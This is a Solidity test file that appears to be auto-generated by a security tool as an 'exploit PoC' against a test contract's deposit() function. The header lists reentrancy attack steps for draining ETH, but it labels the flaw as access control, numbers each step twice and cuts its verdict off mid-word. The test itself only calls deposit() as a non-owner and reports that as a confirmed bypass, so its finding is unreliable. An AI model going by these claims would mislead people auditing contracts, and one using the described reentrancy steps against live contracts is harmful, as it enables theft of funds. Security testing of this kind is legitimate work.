// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #5 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      _test_read-only_reentrancy
 * FUNCTION:      deposit
 * VULNERABILITY: ACCESS CONTROL
 * SEVERITY:      high
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: deposit() — Z3 SAT with concrete values, invariant 'balance_conservation' violated. Att
 *
 * ATTACK STEPS:
 *   1. 1. Attacker deploys malicious contract with receive()/fallback()
 *   2. 2. Attacker deposits 9444.73 ETH → deposit() records balance
 *   3. 3. Attacker calls deposit()
 *   4. 4. Contract sends 9444.73 ETH via .call{value} BEFORE updating state
 *   5. 5. Attacker's receive() re-enters deposit()
 *   6. 6. require(balances[attacker] >= amount) PASSES — balance not yet decremented
 *   7. 7. Contract sends 9444.73 ETH AGAIN
 *   8. 8. State finally updates — but attacker already received 2x
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-27 21:54
 */

import "../../_test_read-only_reentrancy.sol";

contract PoC_AccessControl__test_read-only_reentrancy_Test is Test {
    _test_read-only_reentrancy public target;

    function setUp() public {
        target = new _test_read-only_reentrancy();
    }

    function test_access_control_bypass() public {
        console.log("=== AGL PoC: Access Control in _test_read-only_reentrancy.deposit ===");

        address attacker = makeAddr("attacker");

        // Try calling the unprotected function as a non-owner
        vm.prank(attacker);

        // Low-level call with correct signature
        (bool success, ) = address(target).call(
            abi.encodeWithSignature("deposit(address)", attacker)
        );

        if (success) {
            console.log("[CONFIRMED] Access control missing on deposit!");
            console.log("  Non-owner was able to call privileged function");
        } else {
            console.log("[SAFE] Function correctly reverted for non-owner");
        }

        assertTrue(success, "Access control bypass: non-owner should succeed on unprotected function");
    }
}
